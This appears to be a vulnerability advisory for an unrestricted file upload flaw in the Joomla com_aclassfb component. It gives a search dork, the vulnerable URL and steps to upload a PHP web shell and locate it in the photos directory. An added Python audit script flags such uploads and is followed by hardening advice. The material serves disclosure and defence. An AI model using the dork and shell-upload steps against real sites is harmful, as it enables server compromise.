Title : Joomla com_aclassfb File Upload Vulnerability
Category : Web Applications
Type : PHP
Tested : Mozilla, Chrome, Opera -> Windows & Linux
Vulnerability : File Upload
Dork : inurl:com_aclassfb
File Upload
http://127.0.0.1/index.php?option=com_aclassfb
Exploit
http://127.0.0.1/index.php?option=com_aclassfb&Itemid=[ID]&ct=[CATEGORY]&md=add_form
POC
1. Select Category
2. After Select Category, Click “Post New Ad”
http://127.0.0.1/index.php?option=com_aclassfb&Itemid=[ID]&ct=[CATEGORY]&md=add_form
3. Upload Your Shell
extension : .php .php.jpg / etc
Shell Access :
http://127.0.0.1/component/com_aclassfb/photos/
Find Your Shell
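
Audit check for the photos directory above, added here as an example (not code from the component or from the original advisory): it flags stored files whose name carries an executable extension in any position, covering the .php and .php.jpg cases from step 3, or whose content is not the image its extension claims. The extension list, function names and sample files are assumptions constructed for illustration.

```python
import os

# Extensions PHP handlers commonly execute (assumed list; match it to your server config).
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht"}
# Leading bytes expected for each image extension allowed in the photos directory.
IMAGE_MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def audit_upload(name, data):
    """Return the reasons a stored upload is suspicious; an empty list means none found."""
    reasons = []
    exts = os.path.basename(name).lower().split(".")[1:]
    final = exts[-1] if exts else ""
    # Check every dot-separated segment, so "x.php.jpg" is caught as well as "x.php".
    if any(e in EXECUTABLE_EXTS for e in exts):
        reasons.append("executable extension in name")
    if final not in IMAGE_MAGIC:
        reasons.append("final extension not on image allowlist")
    elif not data.startswith(IMAGE_MAGIC[final]):
        reasons.append("content does not match extension")
    if b"<?php" in data.lower():
        reasons.append("PHP open tag in content")
    return reasons


def audit_files(files):
    """Map each flagged file name to its reasons. `files` is an iterable of (name, bytes)."""
    return {n: r for n, d in files if (r := audit_upload(n, d))}


# Constructed sample directory contents (harmless placeholder bytes, not real uploads).
SAMPLES = [
    ("cat.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16),
    ("ad1.php", b"<?php /* placeholder */ ?>"),
    ("ad2.php.jpg", b"<?php /* placeholder */ ?>"),
    ("ad3.gif", b"GIF89a<?php /* placeholder */ ?>"),
    (".htaccess", b"# placeholder"),
]

if __name__ == "__main__":
    for name, reasons in audit_files(SAMPLES).items():
        print(f"{name}: {', '.join(reasons)}")
```

The same checks belong in the upload handler itself, before the file is written, together with a web server rule that disables script execution under the photos directory.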